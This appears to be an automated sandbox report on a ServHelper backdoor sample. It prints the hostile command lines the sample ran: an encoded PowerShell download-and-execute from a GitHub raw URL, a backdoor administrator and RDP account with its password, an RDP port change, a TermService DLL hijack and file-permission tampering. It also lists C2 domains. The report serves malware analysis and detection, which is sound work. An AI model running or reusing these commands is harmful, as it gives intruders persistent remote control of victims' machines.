Malware Analysis Report

2024-10-23 17:54

Sample ID 210720-lyfcmb2qna
Target exe1.bin
SHA256 6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2
Tags
servhelper backdoor discovery exploit persistence trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2

Threat Level: Known bad

The file exe1.bin was found to be: Known bad.

Malicious Activity Summary

servhelper backdoor discovery exploit persistence trojan upx

ServHelper

Grants admin privileges

Modifies RDP port number used by Windows

Blocklisted process makes network request

Sets DLL path for service in the registry

Possible privilege escalation attempt

UPX packed file

Modifies file permissions

Loads dropped DLL

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Suspicious behavior: LoadsDriver

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Modifies registry key

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Script User-Agent

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-07-20 09:16

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-07-20 09:16

Reported

2021-07-20 09:20

Platform

win7v20210408

Max time kernel

131s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\exe1.bin.exe"

Signatures

ServHelper

trojan backdoor servhelper

Grants admin privileges

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Modifies RDP port number used by Windows

Possible privilege escalation attempt

exploit
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\takeown.exe | N/A
N/A | N/A | C:\Windows\system32\icacls.exe | N/A
N/A | N/A | C:\Windows\system32\icacls.exe | N/A
N/A | N/A | C:\Windows\system32\icacls.exe | N/A
N/A | N/A | C:\Windows\system32\icacls.exe | N/A
N/A | N/A | C:\Windows\system32\icacls.exe | N/A
N/A | N/A | C:\Windows\system32\icacls.exe | N/A
N/A | N/A | C:\Windows\system32\icacls.exe | N/A

Sets DLL path for service in the registry

persistence

UPX packed file

upx
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Loads dropped DLL

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Drops file in System32 directory

Description | Indicator | Process | Target
File created | C:\Windows\system32\rfxvmt.dll | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Drops file in Windows directory

Description | Indicator | Process | Target
File created | C:\Windows\branding\mediasvc.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\branding\mediasvc.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1323314d-f38f-43cf-8826-e6eae8d79402 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_d3e54fc2-be7b-4c5b-aa43-a5a343edd931 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b8634b9e-62cb-41f8-bbe4-da7bf5436d03 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UXZB1YYNPNPQRGX58D3K.temp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_281ac449-6d71-4b99-8b80-5addd3c2b549 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_872c52d3-c0cf-4501-adbe-a5e004ef4efb | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ea514b11-8fd8-47b7-88ad-1aabf028c967 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5505034d-bee8-49a7-bc94-eb5e1f4ffb6b | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File created | C:\Windows\branding\mediasrv.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\branding\Basebrd | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_d5b04d74-21e7-426a-8ef5-5414996dfe1b | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_179593a8-6966-470f-8620-c781a3dbbe65 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a1938cdf-02b0-497b-bd02-20aadc0e0bdd | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File created | C:\Windows\branding\wupsvc.jpg | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\branding\ShellBrd | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\branding\mediasrv.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\branding\wupsvc.jpg | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_03e55983-7a1e-4a20-a1be-3b1870f1f0c6 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Modifies data under HKEY_USERS

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\Wbem\WMIC.exe | N/A
Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = b034bf6c587dd701 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\Wbem\WMIC.exe | N/A

Modifies registry key

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\reg.exe | N/A

Runs net.exe

Suspicious behavior: LoadsDriver

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\system32\icacls.exe | N/A
Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1984 wrote to memory of 568 | N/A | C:\Users\Admin\AppData\Local\Temp\exe1.bin.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1984 wrote to memory of 568 | N/A | C:\Users\Admin\AppData\Local\Temp\exe1.bin.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1984 wrote to memory of 568 | N/A | C:\Users\Admin\AppData\Local\Temp\exe1.bin.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 568 wrote to memory of 1532 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 568 wrote to memory of 1532 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 568 wrote to memory of 1532 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1532 wrote to memory of 1880 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1532 wrote to memory of 1880 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1532 wrote to memory of 1880 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 568 wrote to memory of 1372 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 568 wrote to memory of 1372 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 568 wrote to memory of 1372 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 568 wrote to memory of 1068 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 568 wrote to memory of 1068 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 568 wrote to memory of 1068 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 568 wrote to memory of 1164 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 568 wrote to memory of 1164 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 568 wrote to memory of 1164 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 568 wrote to memory of 1592 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\takeown.exe
PID 568 wrote to memory of 1592 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\takeown.exe
PID 568 wrote to memory of 1592 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\takeown.exe
PID 568 wrote to memory of 1568 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 568 wrote to memory of 1568 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 568 wrote to memory of 1568 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 568 wrote to memory of 620 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 568 wrote to memory of 620 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 568 wrote to memory of 620 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 568 wrote to memory of 1680 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 568 wrote to memory of 1680 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 568 wrote to memory of 1680 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 568 wrote to memory of 1964 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 568 wrote to memory of 1964 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 568 wrote to memory of 1964 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 568 wrote to memory of 1100 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 568 wrote to memory of 1100 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 568 wrote to memory of 1100 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 568 wrote to memory of 1712 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 568 wrote to memory of 1712 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 568 wrote to memory of 1712 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 568 wrote to memory of 1780 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 568 wrote to memory of 1780 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 568 wrote to memory of 1780 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\icacls.exe
PID 568 wrote to memory of 940 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\reg.exe
PID 568 wrote to memory of 940 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\reg.exe
PID 568 wrote to memory of 940 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\reg.exe
PID 568 wrote to memory of 892 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\reg.exe
PID 568 wrote to memory of 892 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\reg.exe
PID 568 wrote to memory of 892 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\reg.exe
PID 568 wrote to memory of 1472 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\reg.exe
PID 568 wrote to memory of 1472 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\reg.exe
PID 568 wrote to memory of 1472 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\reg.exe
PID 568 wrote to memory of 1256 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\net.exe
PID 568 wrote to memory of 1256 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\net.exe
PID 568 wrote to memory of 1256 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\net.exe
PID 1256 wrote to memory of 1312 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1256 wrote to memory of 1312 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1256 wrote to memory of 1312 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 568 wrote to memory of 1664 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 568 wrote to memory of 1664 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 568 wrote to memory of 1664 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 1664 wrote to memory of 1392 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 1664 wrote to memory of 1392 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 1664 wrote to memory of 1392 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 1392 wrote to memory of 1896 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\net.exe

Processes

C:\Users\Admin\AppData\Local\Temp\exe1.bin.exe

"C:\Users\Admin\AppData\Local\Temp\exe1.bin.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4ollxdjq\4ollxdjq.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES620D.tmp" "c:\Users\Admin\AppData\Local\Temp\4ollxdjq\CSCD430DA36425C492D97B3F7169A39AFC7.TMP"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile

C:\Windows\system32\takeown.exe

"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\system32\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\system32\cmd.exe

cmd /c net start rdpdr

C:\Windows\system32\net.exe

net start rdpdr

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\system32\cmd.exe

cmd /c net start TermService

C:\Windows\system32\net.exe

net start TermService

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc 000000 /del

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc 3wIPoLDq /add

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc 3wIPoLDq /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc 3wIPoLDq /add

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc 3wIPoLDq

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc 3wIPoLDq

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc 3wIPoLDq

C:\Windows\System32\cmd.exe

cmd.exe /C wmic path win32_VideoController get name

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\System32\cmd.exe

cmd.exe /C wmic CPU get NAME

C:\Windows\System32\Wbem\WMIC.exe

wmic CPU get NAME

C:\Windows\System32\cmd.exe

cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

Network

Country | Destination | Domain | Proto
N/A | 8.8.8.8:53 | raw.githubusercontent.com | udp
N/A | 185.199.108.133:443 | raw.githubusercontent.com | tcp
N/A | 8.8.8.8:53 | pgf5ga4g4b.cn | udp
N/A | 8.8.8.8:53 | pgf5ga4g4b.cn | udp
N/A | 206.188.196.143:443 | pgf5ga4g4b.cn | tcp

Files

memory/1984-59-0x00000000410A0000-0x000000004134A000-memory.dmp

memory/1984-63-0x0000000040B76000-0x0000000040B77000-memory.dmp

memory/1984-62-0x0000000040B74000-0x0000000040B76000-memory.dmp

memory/1984-61-0x0000000040B72000-0x0000000040B74000-memory.dmp

memory/1984-64-0x0000000040B77000-0x0000000040B78000-memory.dmp

memory/568-65-0x0000000000000000-mapping.dmp

memory/568-66-0x000007FEFC051000-0x000007FEFC053000-memory.dmp

memory/568-67-0x0000000002350000-0x0000000002351000-memory.dmp

memory/568-68-0x000000001AAA0000-0x000000001AAA1000-memory.dmp

memory/568-69-0x000000001A9C0000-0x000000001A9C1000-memory.dmp

memory/568-70-0x000000001B490000-0x000000001B491000-memory.dmp

memory/568-71-0x000000001AA20000-0x000000001AA22000-memory.dmp

memory/568-72-0x000000001AA24000-0x000000001AA26000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ready.ps1

MD5 3447df88de7128bdc34942334b2fab98
SHA1 519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA256 9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA512 2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

memory/568-74-0x000000001C3F0000-0x000000001C3F1000-memory.dmp

memory/1532-75-0x0000000000000000-mapping.dmp

